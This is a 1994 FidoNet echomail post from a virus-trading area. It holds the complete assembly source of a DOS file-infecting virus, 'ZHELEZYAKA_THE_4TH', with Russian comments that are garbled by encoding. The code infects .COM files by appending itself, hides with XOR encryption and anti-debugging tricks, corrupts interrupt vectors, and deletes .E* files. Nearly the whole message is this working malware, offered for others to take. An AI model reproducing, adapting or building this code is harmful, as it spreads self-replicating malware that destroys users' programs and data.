;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä ; Msg : 1 of 64 ; From : MeteO 2:5030/136 Tue 09 Nov 93 08:59 ; To : - *.* - Fri 11 Nov 94 08:10 ; Subj : ViRii ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ;.RealName: Max Ivanov ;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ;* Kicked-up by MeteO (2:5030/136) ;* Area : ABC.PVT.HACK (ABC: • æª...) ;* From : Alexei Galich, 123:1000/6.2 (31 Oct 94 13:44) ;* To : All ;* Subj : ViRii ;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ;p¨¢¥âáâ¢yî ‚ á, All ; ;‚®â ¢¨pyá ¯¨á «, áâp èë©, á ¬ ¯¨á « ! ;H ¥§¤ë ¯p¨¨¬ îâáï á 1:00-8:00 ; ;PS: Hy ¥ § î ï ¯®ç¥¬y ® â ¡y«îæ¨î ¥ ¯®ï«, ¨§¢¨¨â¥. ; ;--------8<------------------------------------------------------- ; ; ; ZHELEZYAKA_THE_4TH IDEAL MODEL TINY CODESEG ORG 100H LOCALS MAIN_BEGIN: JMP VIRUS_START_O DB 04H,0,' ZHELEZYAKA_THE_4TH ',0 EXIT_ADDRESS EQU 100H DOS EQU 21H VIRUS_SIGNATURE EQU 04H NUM_FIRST_BYTES EQU 4 ALREADY_INFECT EQU 3 COUNTER_ADDR EQU 510H FALSE_BYTE_ADDR EQU 104H COM_WILDCARD EQU (COM_WILDCARD_O-VIRUS_START_O) EXE_WILDCARD EQU (EXE_WILDCARD_O-VIRUS_START_O) WRITE_BUFFER EQU (WRITE_BUFFER_O-VIRUS_START_O) ORIGIN_DIR EQU (WRITE_BUFFER+NUM_FIRST_BYTES) NEW_DTA EQU (ORIGIN_DIR+65) COPY_BUFFER EQU (NEW_DTA+256) FALSE_BYTES EQU (COPY_BUFFER+WRITE_BUFFER) ORIGIN_BEGIN EQU (ORIGIN_BEGIN_O-VIRUS_START_O) MAIN_PART_LEN EQU (WRITE_BUFFER) INFECTED_NUMB EQU (INFECTED_NUMB_O-VIRUS_START_O) XOR_VALUE EQU (XOR_VALUE_O-VIRUS_START_O) XOR_VAL0 EQU (XOR_VAL0_O-VIRUS_START_O) XOR_VAL00 EQU (XOR_VAL00_O-VIRUS_START_O) XOR_VAL1 EQU (XOR_VAL1_O-VIRUS_START_O) XOR_VAL2 EQU (XOR_VAL2_O-VIRUS_START_O) XOR_VAL3 EQU (XOR_VAL3_O-VIRUS_START_O) XOR_VAL4 EQU (XOR_VAL4_O-VIRUS_START_O) BEGIN_CODING EQU (BEGIN_CODING_O-VIRUS_START_O) CONT_CODING EQU (CONT_CODING_O-VIRUS_START_O) MESSAGE EQU (MESSAGE_O-VIRUS_START_O) DOT EQU (DOT_O-VIRUS_START_O) VIRUS_START_O: CALL DETECT_BEGIN_O XOR_VAL0_O DB 0 DETECT_BEGIN_O: POP SI SUB SI,3 ; SI - ç «® ¢¨àãá JMP SHORT @@0 XOR_VAL00_O DB 0 @@0: LEA DI,[SI+BEGIN_CODING] CALL CODE BEGIN_CODING_O =$ MOV CX,NUM_FIRST_BYTES ; ‹¥ç¨¬ LEA DI,[SI+ORIGIN_BEGIN] ; ä ©« MOV BX,100H ; ¢ MOVE_LOOP: MOV AH,[DI] ; ¯ ¬ï⨠MOV [BX],AH ; INC DI ; INC BX ; LOOP MOVE_LOOP ; LEA DX,[SI+NEW_DTA] ; ‘â ¢¨¬ MOV AH,1AH ; ᢮î CALL CHECK ; DTA MOV AH,47H ; PUSH SI ; ‡ ¯®¬¨ ¥¬ LEA SI,[SI+ORIGIN_DIR+1] ; ⥪ã騩 CWD ; ª â «®£ CALL CHECK ; POP SI ; FIND_FIRST: LEA DX,[SI+COM_WILDCARD] ; ®¨áª ¯¥à¢®£® XOR CX,CX ; COM ä ©« MOV AH,4EH ; FIND_NEXT: INT DOS ; JNC @@L1 ; JMP NO_FILES_FOUND ; …᫨ ¥â, â® ... @@L1: LEA DX,[SI+NEW_DTA+1EH] ; Žâªà®¥¬ MOV AX,3D02H ; íâ®â CALL CHECK ; ä ©« MOV BX,AX ; à®ç¨â ¥¬ MOV AH,3FH ; ¯¥à¢ë¥ 4 LEA DX,[SI+ORIGIN_BEGIN] ; ¡ ©â MOV DI,DX ; ¨§ MOV CX,NUM_FIRST_BYTES ; í⮣® INT DOS ; ä ©« ADD DI,NUM_FIRST_BYTES-1 CMP [BYTE PTR DI],VIRUS_SIGNATURE JE @@L2 JMP INFECT_FILE @@L2: MOV AH,3EH ; ‡ ªà®¥¬ CALL CHECK ; ä ©« CONT_SEARCHING: MOV AH,4FH ; ©â¨ JMP FIND_NEXT ; á«¥¤ãî騩 ä ©« COM_WILDCARD_O DB '*.COM',0 EXE_WILDCARD_O DB '*.E*',0 MESSAGE_O DB 13,10,'ZHELEZYAKA_THE_4TH WITH YOU FOREVER',13,10,'$' DOT_O DB '..',0 NO_FILES_FOUND: MOV AH,3BH ; ‘¬¥é ¥¬áï LEA DX,[SI+DOT] ; ª â «®£ INT DOS ; ¢¢¥àå JC @@L4 ; ¯®ª JMP FIND_FIRST ; ¢®§¬®¦® @@L4: XOR AX,AX ; MOV ES,AX ; “¢¥«¨ç¨¢ ¥¬ MOV DI,COUNTER_ADDR ; áç¥â稪 MOV AX,[ES:DI] ; INC AL ; MOV [ES:DI],AX ; —â® CMP AL,ALREADY_INFECT ; ¡ã¤¥¬ JG INFECT_MORE ; ¤¥« âì? CMP AH,ALREADY_INFECT-2 ; JG BANNER ; JMP EXECUTE_PROG ; BANNER: XOR AX,AX ; ‘¡à®á áç¥â稪 MOV [ES:DI],AX LEA DX,[SI+MESSAGE] ; ‚뢮¤ MOV AH,9 ; á®®¡é¥¨ï CALL CHECK ; MOV CX,5 ; CONTINUE_NOISE: MOV DL,7 ; ¨áª MOV AH,2 ; INT DOS ; LOOP CONTINUE_NOISE JMP EXECUTE_PROG INFECT_MORE: XOR AL,AL ; ‘â¨à ¨¥ ¯¥à¢®£® .E* ä ©« INC AH MOV [ES:DI],AX LEA DI,[SI+ORIGIN_DIR] ; MOV [BYTE PTR DI],'\' ; ‚®ááâ ¢«¨¢ ¥¬ MOV AH,3BH ; áâ àë© XCHG DX,DI ; ª â «®£ INT DOS ; LEA DX,[SI+EXE_WILDCARD] XOR CX,CX MOV AH,4EH INT DOS JC EXECUTE_PROG LEA DX,[SI+NEW_DTA+1EH] MOV AH,41H INT 21H EXECUTE_PROG: MOV DX,80H ; ‘â ¢¨¬ MOV AH,1AH ; áâ àãî INT DOS ; DTA LEA DI,[SI+ORIGIN_DIR] ; MOV [BYTE PTR DI],'\' ; ‚®ááâ ¢«¨¢ ¥¬ MOV AH,3BH ; áâ àë© XCHG DX,DI ; ª â «®£ INT DOS ; MOV AX,DS MOV ES,AX MOV BP,100H ; JMP BP ; INFECT_FILE: XOR AL,AL ; MOV AH,[BYTE PTR SI+XOR_VALUE] ; @@IFZERO: INC AH ; JZ @@IFZERO ; ®¤£®â ¢«¨¢ ¥¬ MOV [BYTE PTR SI+XOR_VALUE],AH ; ®¢ë© MOV [SI+XOR_VAL0],AH ; ª®¤ MOV [SI+XOR_VAL00],AH ; MOV [SI+XOR_VAL1],AH ; MOV [SI+XOR_VAL2],AH ; MOV [SI+XOR_VAL3],AH ; MOV [SI+XOR_VAL4],AH ; MOV AX,5700H ; ‡ ¯®¬¨ ¥¬ CALL CHECK ; ¢à¥¬ï PUSH CX ; ᮧ¤ ¨ï PUSH DX ; XOR CX,CX ; ˆ¤¥¬ XOR DX,DX ; MOV AX,4202H ; ª®¥æ CALL CHECK ; ä ©« SUB AX,3 ; ®¤£®â ¢«¨¢ ¥¬ MOV [BYTE PTR SI+WRITE_BUFFER],0E9H ; ®¢ë¥ MOV [SI+WRITE_BUFFER+1],AX ; 4 ¡ ©â MOV [BYTE PTR SI+WRITE_BUFFER+3],VIRUS_SIGNATURE MOV CX,MAIN_PART_LEN ; MOV DI,SI ; Š®¯¨à㥬 COPY_LOOP: MOV AH,[DI] ; ¢¨àãá MOV [DI+COPY_BUFFER],AH ; ¢ INC DI ; ¡ãää¥à LOOP COPY_LOOP ; LEA DI,[SI+COPY_BUFFER+BEGIN_CODING] ; Š®¤¨à㥬 CALL CODER_DECODER ; ¥£® LEA DI,[SI+COPY_BUFFER+CONT_CODING] CALL FIRST_CODE MOV CX,MAIN_PART_LEN ; ®¤¡¨à ¥¬ MOV AL,[BYTE PTR FALSE_BYTE_ADDR] ; ¤«¨ã ADD AL,[FALSE_BYTES] ; XOR AH,AH ; ADD CX,AX ; ¨è¥¬ LEA DX,[SI+COPY_BUFFER] ; £« ¢ãî MOV AH,40H ; ç áâì INT DOS ; ¢¨àãá XOR CX,CX ; ˆ¤¥¬ XOR DX,DX ; MOV AX,4200H ; ç «® CALL CHECK ; ä ©« MOV CX,NUM_FIRST_BYTES ; ˆá¯à ¢«ï¥¬ LEA DX,[SI+WRITE_BUFFER] ; ¯¥à¢ë¥ MOV AH,40H ; ¡ ©âë INT DOS ; ä ©« POP DX ; ‚®ááâ ¢«¨¢ ¥¬ POP CX ; ¢à¥¬ï MOV AX,5701H ; ᮧ¤ ¨ï CALL CHECK ; MOV AH,3EH ; ‡ ªàë¢ ¥¬ INT DOS ; ä ©« CALL CODE_INT JMP EXECUTE_PROG ORIGIN_BEGIN_O DB 0CDH,20H,90H,90H CONT_CODING_O =$ CODER_DECODER: MOV CX,CODER_DECODER-BEGIN_CODING_O-1 MOV AH,[SI+XOR_VALUE] XOR AL,AL OUT 21H,AL CODING_LOOP: IN AL,21H ADD AL,AH XOR [DI],AL ; ‘ ¬ INC DI ; ª®¤¨à®¢é¨ª ADD AL,[FALSE_BYTE_ADDR] OUT 21H,AL ; LOOP CODING_LOOP ; XOR AL,AL OUT 21H,AL RET CHECK: PUSH AX ; «®ª¨à®¢ª ¯à¥àë¢ ¨ï PUSHF MOV AL,0FEH OUT 21H,AL MOV AH,4FH POPF POP AX INT 21H PUSH AX PUSHF IN AL,21H CMP AL,0FEH @@HALT: JNE @@HALT XOR AL,AL OUT 21H,AL POPF POP AX RET CODE_INT: XOR AX,AX ; Š®¤¨à®¢ ¨¥ INT 0 - 3 MOV ES,AX MOV CX,12 COD_INT_CON: MOV BX,CX XOR [BYTE PTR ES:BX],10101010B LOOP COD_INT_CON PUSH CS POP ES RET ; ------------ FIRST_CODE: MOV CX,FIRST_CODE-CODER_DECODER ; ।¢ à¨â¥«ìë© MOV AH,[SI+XOR_VALUE] ; ª®¤¨à®¢é¨ª JMP SHORT FIRST_COD_LOOP XOR_VAL1_O DB 0 FIRST_COD_LOOP: XOR [DI],AH INC DI JMP SHORT @@2 XOR_VAL2_O DB 0 @@2: LOOP FIRST_COD_LOOP RET XOR_VALUE_O DB 0 CODE: PUSH DI LEA DI,[SI+CONT_CODING] JMP @@3 XOR_VAL3_O DB 0 @@3: CALL FIRST_CODE MOV AH,40H JMP @@4 XOR_VAL4_O DB 0 @@4: CALL CHECK ; —â®¡ë ®¡¬ ãâì ¯¥à¥å¢ â稪 CALL CODE_INT POP DI JMP SHORT CODER_DECODER WRITE_BUFFER_O =$ END MAIN_BEGIN ;---------------8<------------------------------------------------- ; ;- ‚ᥠíâ® ¡ë«® ¡ë ¯p¨ª®«ì®, ª®£¤ ¡ë ¥ ¡ë«® â ª ¡®«ì®. ; ; -= iR0NMAN =- ; ;-+- GoldED 2.50.B1016+ ; + Origin: Œ…H’Ž‚Š€ - ’Ž €‡„HˆŠ !!! (123:1000/6.2) ;============================================================================= ; ;Yoo-hooo-oo, -! ; ; ; þ The MeÂeO ; ;/p Check for code segment overrides in protected mode ; ;--- Aidstest Null: /Kill ; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)